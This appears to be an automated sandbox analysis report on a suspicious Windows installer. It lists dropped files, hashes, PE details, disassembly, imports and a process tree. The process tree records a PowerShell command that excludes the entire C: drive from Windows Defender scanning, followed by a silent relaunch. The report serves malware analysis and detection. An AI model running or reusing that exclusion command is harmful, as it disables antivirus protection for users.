                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):6144
                                    Entropy (8bit):4.720366600008286
                                    Encrypted:false
                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3621376
                                    Entropy (8bit):7.006090025798393
                                    Encrypted:false
                                    SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                    MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                    SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                    SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                    SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 26%
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3366912
                                    Entropy (8bit):6.530562538281642
                                    Encrypted:false
                                    SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                    MD5:C9B4238B2FFEC70B575E52822B8A8F70
                                    SHA1:8B008190A81BD70F937E9ED70756E611A5814A17
                                    SHA-256:69872DDA1D5F8A3C9F93646165519F8A97A1CE8E21DAFE680789020C973EC057
                                    SHA-512:CA0FE894C953E066827ED0B116600E45C1791C178E65AACF1D1417085C6DBE05528AF230E0DD05B2AA0F35D10C2B4761A267D2A7EBB7B504AA1B7FFFD652CDF3
                                    Malicious:true
                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):6144
                                    Entropy (8bit):4.720366600008286
                                    Encrypted:false
                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3621376
                                    Entropy (8bit):7.006090025798393
                                    Encrypted:false
                                    SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                    MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                    SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                    SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                    SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 26%
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3366912
                                    Entropy (8bit):6.530562538281642
                                    Encrypted:false
                                    SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                    MD5:C9B4238B2FFEC70B575E52822B8A8F70
                                    SHA1:8B008190A81BD70F937E9ED70756E611A5814A17
                                    SHA-256:69872DDA1D5F8A3C9F93646165519F8A97A1CE8E21DAFE680789020C973EC057
                                    SHA-512:CA0FE894C953E066827ED0B116600E45C1791C178E65AACF1D1417085C6DBE05528AF230E0DD05B2AA0F35D10C2B4761A267D2A7EBB7B504AA1B7FFFD652CDF3
                                    Malicious:true
                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:ASCII text, with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):406
                                    Entropy (8bit):5.117520345541057
                                    Encrypted:false
                                    SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                    MD5:9200058492BCA8F9D88B4877F842C148
                                    SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                    SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                    SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                    Malicious:false
                                    Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.962340023354145
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 98.04%
                                    • Inno Setup installer (109748/4) 1.08%
                                    • InstallShield setup (43055/19) 0.42%
                                    • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                    File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File size:9'026'305 bytes
                                    MD5:8af97a4879574d6e29e4e9fcd3a9bef0
                                    SHA1:3c0fcaf35b6f6cb6eb710ccb91c691fa629430ab
                                    SHA256:ac7a870316c9f66b5750e39592f97e58a5ae8da0f05951a5f25047b15aa88041
                                    SHA512:17c2dd2a92c733040b474549ffaad59ffdc632fa15b0c701742c26f8bfda89b8bd62e91545889e57feec6e951a7bcb886d865a975dd16a4571b61c1e8db4d74d
                                    SSDEEP:196608:ljhhOJmKi8b+H7K+ofxIrA12fIkfRZUNNbqlg:ljRKP+HGhxsAUfIQRZkUC
                                    TLSH:AD962313F2CBD43EE06A0B3755B2A15484FB6A606427BE468AEC74ACCF365501E3E747
                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                    Icon Hash:0c0c2d33ceec80aa
                                    Entrypoint:0x4a83bc
                                    Entrypoint Section:.itext
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:1
                                    File Version Major:6
                                    File Version Minor:1
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:1
                                    Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    add esp, FFFFFFA4h
                                    push ebx
                                    push esi
                                    push edi
                                    xor eax, eax
                                    mov dword ptr [ebp-3Ch], eax
                                    mov dword ptr [ebp-40h], eax
                                    mov dword ptr [ebp-5Ch], eax
                                    mov dword ptr [ebp-30h], eax
                                    mov dword ptr [ebp-38h], eax
                                    mov dword ptr [ebp-34h], eax
                                    mov dword ptr [ebp-2Ch], eax
                                    mov dword ptr [ebp-28h], eax
                                    mov dword ptr [ebp-14h], eax
                                    mov eax, 004A2EBCh
                                    call 00007FF8113228C5h
                                    xor eax, eax
                                    push ebp
                                    push 004A8AC1h
                                    push dword ptr fs:[eax]
                                    mov dword ptr fs:[eax], esp
                                    xor edx, edx
                                    push ebp
                                    push 004A8A7Bh
                                    push dword ptr fs:[edx]
                                    mov dword ptr fs:[edx], esp
                                    mov eax, dword ptr [004B0634h]
                                    call 00007FF8113B424Bh
                                    call 00007FF8113B3D9Eh
                                    lea edx, dword ptr [ebp-14h]
                                    xor eax, eax
                                    call 00007FF8113AEA78h
                                    mov edx, dword ptr [ebp-14h]
                                    mov eax, 004B41F4h
                                    call 00007FF81131C973h
                                    push 00000002h
                                    push 00000000h
                                    push 00000001h
                                    mov ecx, dword ptr [004B41F4h]
                                    mov dl, 01h
                                    mov eax, dword ptr [0049CD14h]
                                    call 00007FF8113AFDA3h
                                    mov dword ptr [004B41F8h], eax
                                    xor edx, edx
                                    push ebp
                                    push 004A8A27h
                                    push dword ptr fs:[edx]
                                    mov dword ptr fs:[edx], esp
                                    call 00007FF8113B42D3h
                                    mov dword ptr [004B4200h], eax
                                    mov eax, dword ptr [004B4200h]
                                    cmp dword ptr [eax+0Ch], 01h
                                    jne 00007FF8113BAFBAh
                                    mov eax, dword ptr [004B4200h]
                                    mov edx, 00000028h
                                    call 00007FF8113B0698h
                                    mov edx, dword ptr [004B4200h]
                                     Name | Virtual Address | Virtual Size | Is in Section
                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                     .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                     .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                     .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                     .rsrc | 0xcb000 | 0x11000 | 0x11000 | bd2e661569cc3ed9cbb634151f4f1236 | False | 0.18764361213235295 | data | 3.7223784289670983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                     RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                     RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                     RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                     RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                     RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                     RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                     RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                     RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                     RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                     RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                     RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                     RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                     RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                     RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                     RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                     RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                     RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                     RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                     RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                     RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                     RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                     RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                     RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                     RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                     RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                     RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                     RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                                     RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                     RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2776203966005666
                                     RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                     DLL | Import
                                     kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                     comctl32.dll | InitCommonControls
                                     user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                     oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                     advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                     Name | Ordinal | Address
                                     __dbk_fcall_wrapper | 2 | 0x40fc10
                                     dbkFCallWrapperAddr | 1 | 0x4b063c
                                     Language of compilation system | Country where language is spoken | Map
                                     English | United States |
                                    No network behavior found

                                    Target ID:0
                                    Start time:22:30:56
                                    Start date:24/12/2024
                                    Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
                                    Imagebase:0x310000
                                    File size:9'026'305 bytes
                                    MD5 hash:8AF97A4879574D6E29E4E9FCD3A9BEF0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:22:30:56
                                    Start date:24/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
                                    Imagebase:0x2f0000
                                    File size:3'366'912 bytes
                                    MD5 hash:C9B4238B2FFEC70B575E52822B8A8F70
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
                                    Imagebase:0x310000
                                    File size:9'026'305 bytes
                                    MD5 hash:8AF97A4879574D6E29E4E9FCD3A9BEF0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:false

                                    Target ID:6
                                    Start time:22:30:58
                                    Start date:24/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
                                    Imagebase:0x4f0000
                                    File size:3'366'912 bytes
                                    MD5 hash:C9B4238B2FFEC70B575E52822B8A8F70
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
